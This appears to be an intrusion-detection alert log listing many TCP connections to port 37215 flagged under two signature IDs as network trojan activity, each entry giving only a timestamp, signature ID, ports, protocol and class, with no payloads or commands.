            Timestamp:05/28/24-09:55:45.543990
            SID:2829579
            Source Port:37934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.592692
            SID:2835222
            Source Port:49258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040417
            SID:2835222
            Source Port:45786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046506
            SID:2829579
            Source Port:45364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505579
            SID:2829579
            Source Port:40332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862842
            SID:2829579
            Source Port:46274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.042802
            SID:2835222
            Source Port:55694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766566
            SID:2835222
            Source Port:46604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.921740
            SID:2835222
            Source Port:44740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048575
            SID:2835222
            Source Port:36226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.572419
            SID:2835222
            Source Port:54066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916665
            SID:2835222
            Source Port:36144
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.495126
            SID:2829579
            Source Port:47796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435739
            SID:2829579
            Source Port:49914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.664462
            SID:2829579
            Source Port:60182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945498
            SID:2829579
            Source Port:42226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929193
            SID:2829579
            Source Port:37678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.612827
            SID:2829579
            Source Port:55214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809232
            SID:2829579
            Source Port:47706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919928
            SID:2829579
            Source Port:53394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713310
            SID:2829579
            Source Port:56358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064116
            SID:2829579
            Source Port:37628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459748
            SID:2829579
            Source Port:36396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873517
            SID:2835222
            Source Port:32994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943561
            SID:2835222
            Source Port:48554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552885
            SID:2829579
            Source Port:49564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855063
            SID:2835222
            Source Port:38754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326083
            SID:2829579
            Source Port:37928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027020
            SID:2829579
            Source Port:47548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757441
            SID:2829579
            Source Port:57614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857129
            SID:2835222
            Source Port:39294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.780652
            SID:2829579
            Source Port:40228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.368175
            SID:2835222
            Source Port:41520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045809
            SID:2829579
            Source Port:48480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299616
            SID:2835222
            Source Port:51792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027085
            SID:2835222
            Source Port:53006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793782
            SID:2835222
            Source Port:53130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.934979
            SID:2835222
            Source Port:59752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.839589
            SID:2829579
            Source Port:52530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.447048
            SID:2829579
            Source Port:49580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850215
            SID:2835222
            Source Port:35406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989578
            SID:2829579
            Source Port:56286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.940785
            SID:2835222
            Source Port:60222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052742
            SID:2829579
            Source Port:36802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060886
            SID:2829579
            Source Port:54756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.539895
            SID:2829579
            Source Port:54432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060022
            SID:2829579
            Source Port:41036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336133
            SID:2829579
            Source Port:41552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.380908
            SID:2829579
            Source Port:51526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459815
            SID:2835222
            Source Port:41828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052788
            SID:2829579
            Source Port:42634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.858431
            SID:2835222
            Source Port:35278
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.657272
            SID:2835222
            Source Port:45106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993250
            SID:2835222
            Source Port:47184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.587474
            SID:2829579
            Source Port:47418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.561902
            SID:2829579
            Source Port:37592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825490
            SID:2829579
            Source Port:35620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754833
            SID:2829579
            Source Port:39742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807300
            SID:2835222
            Source Port:57322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542487
            SID:2835222
            Source Port:51936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282650
            SID:2829579
            Source Port:35562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953671
            SID:2835222
            Source Port:57640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929518
            SID:2835222
            Source Port:39810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.547131
            SID:2829579
            Source Port:36734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.994439
            SID:2829579
            Source Port:34478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871487
            SID:2835222
            Source Port:58882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860549
            SID:2829579
            Source Port:50250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871317
            SID:2829579
            Source Port:35726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052425
            SID:2835222
            Source Port:47016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943764
            SID:2829579
            Source Port:42550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052573
            SID:2829579
            Source Port:53388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.326176
            SID:2835222
            Source Port:49532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341857
            SID:2829579
            Source Port:53932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039786
            SID:2835222
            Source Port:32904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919411
            SID:2835222
            Source Port:36336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.067505
            SID:2829579
            Source Port:35288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.349091
            SID:2829579
            Source Port:57164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842060
            SID:2835222
            Source Port:59250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038306
            SID:2829579
            Source Port:47038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307515
            SID:2835222
            Source Port:52558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680221
            SID:2835222
            Source Port:33566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862248
            SID:2835222
            Source Port:46706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805610
            SID:2835222
            Source Port:39890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843088
            SID:2835222
            Source Port:35410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605070
            SID:2829579
            Source Port:45930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806791
            SID:2835222
            Source Port:38168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.033484
            SID:2835222
            Source Port:54206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768048
            SID:2835222
            Source Port:46868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278131
            SID:2835222
            Source Port:50802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985924
            SID:2835222
            Source Port:52474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872570
            SID:2829579
            Source Port:54618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.133997
            SID:2835222
            Source Port:39018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.901618
            SID:2835222
            Source Port:43436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857226
            SID:2835222
            Source Port:52112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.802085
            SID:2829579
            Source Port:45820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.742024
            SID:2835222
            Source Port:45992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754739
            SID:2829579
            Source Port:39192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.409431
            SID:2829579
            Source Port:46478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.485871
            SID:2835222
            Source Port:48566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817760
            SID:2835222
            Source Port:44940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412963
            SID:2835222
            Source Port:46842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291000
            SID:2829579
            Source Port:44532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.454118
            SID:2829579
            Source Port:34150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.938878
            SID:2829579
            Source Port:40878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.444215
            SID:2835222
            Source Port:58542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746265
            SID:2835222
            Source Port:46538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:25.154968
            SID:2835222
            Source Port:40096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469825
            SID:2829579
            Source Port:47554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.926430
            SID:2835222
            Source Port:45056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014533
            SID:2835222
            Source Port:39344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.937426
            SID:2835222
            Source Port:38944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929471
            SID:2835222
            Source Port:39988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.414563
            SID:2835222
            Source Port:41286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863898
            SID:2829579
            Source Port:41294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.262017
            SID:2835222
            Source Port:50776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810549
            SID:2829579
            Source Port:53956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670466
            SID:2829579
            Source Port:54990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826220
            SID:2835222
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.549980
            SID:2829579
            Source Port:42476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789235
            SID:2835222
            Source Port:49286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863270
            SID:2829579
            Source Port:57596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559416
            SID:2835222
            Source Port:59372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310463
            SID:2835222
            Source Port:43170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.739052
            SID:2829579
            Source Port:60134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818403
            SID:2829579
            Source Port:53848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759988
            SID:2835222
            Source Port:50180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.919105
            SID:2829579
            Source Port:49874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825422
            SID:2829579
            Source Port:50010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071313
            SID:2829579
            Source Port:48744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.792445
            SID:2835222
            Source Port:34612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.775661
            SID:2835222
            Source Port:46876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988618
            SID:2835222
            Source Port:43546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506721
            SID:2829579
            Source Port:47222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716810
            SID:2829579
            Source Port:60748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965746
            SID:2829579
            Source Port:36910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341234
            SID:2829579
            Source Port:34696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918944
            SID:2829579
            Source Port:50212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.018653
            SID:2835222
            Source Port:43928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706756
            SID:2829579
            Source Port:36202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778182
            SID:2829579
            Source Port:59098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.477576
            SID:2835222
            Source Port:38326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060147
            SID:2835222
            Source Port:53618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655768
            SID:2829579
            Source Port:60546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.081181
            SID:2835222
            Source Port:54692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.899731
            SID:2835222
            Source Port:36838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858381
            SID:2829579
            Source Port:41362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.990133
            SID:2835222
            Source Port:51224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.572160
            SID:2835222
            Source Port:39142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808369
            SID:2829579
            Source Port:47646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941745
            SID:2835222
            Source Port:51316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.736958
            SID:2835222
            Source Port:33340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.966729
            SID:2829579
            Source Port:49544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984879
            SID:2829579
            Source Port:53546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.710419
            SID:2835222
            Source Port:52532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556614
            SID:2835222
            Source Port:44740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716262
            SID:2835222
            Source Port:59588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955524
            SID:2835222
            Source Port:40668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810812
            SID:2835222
            Source Port:38988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811954
            SID:2829579
            Source Port:53376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.896041
            SID:2835222
            Source Port:41118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316963
            SID:2835222
            Source Port:54076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532779
            SID:2829579
            Source Port:33818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832751
            SID:2835222
            Source Port:46814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.964767
            SID:2835222
            Source Port:45148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943282
            SID:2835222
            Source Port:46636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291042
            SID:2835222
            Source Port:52704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936800
            SID:2829579
            Source Port:47902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321243
            SID:2835222
            Source Port:60944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541388
            SID:2835222
            Source Port:52806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870068
            SID:2829579
            Source Port:35260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.773560
            SID:2829579
            Source Port:41558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782516
            SID:2829579
            Source Port:40836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396746
            SID:2829579
            Source Port:53630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882601
            SID:2835222
            Source Port:39108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.048164
            SID:2835222
            Source Port:37538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.762386
            SID:2835222
            Source Port:34742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.407693
            SID:2835222
            Source Port:49060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846973
            SID:2829579
            Source Port:39422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.078937
            SID:2829579
            Source Port:42710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.906027
            SID:2829579
            Source Port:51626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.374885
            SID:2829579
            Source Port:43560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872615
            SID:2829579
            Source Port:51444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445315
            SID:2829579
            Source Port:56210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.550644
            SID:2829579
            Source Port:46042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.720187
            SID:2829579
            Source Port:42134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.699711
            SID:2835222
            Source Port:49998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957993
            SID:2829579
            Source Port:39394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767921
            SID:2835222
            Source Port:45618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808053
            SID:2835222
            Source Port:34248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323135
            SID:2835222
            Source Port:46618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047984
            SID:2835222
            Source Port:57938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842855
            SID:2829579
            Source Port:54766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321348
            SID:2829579
            Source Port:39176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.656003
            SID:2835222
            Source Port:35272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.322593
            SID:2829579
            Source Port:37376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575129
            SID:2835222
            Source Port:56912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047443
            SID:2835222
            Source Port:42730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995397
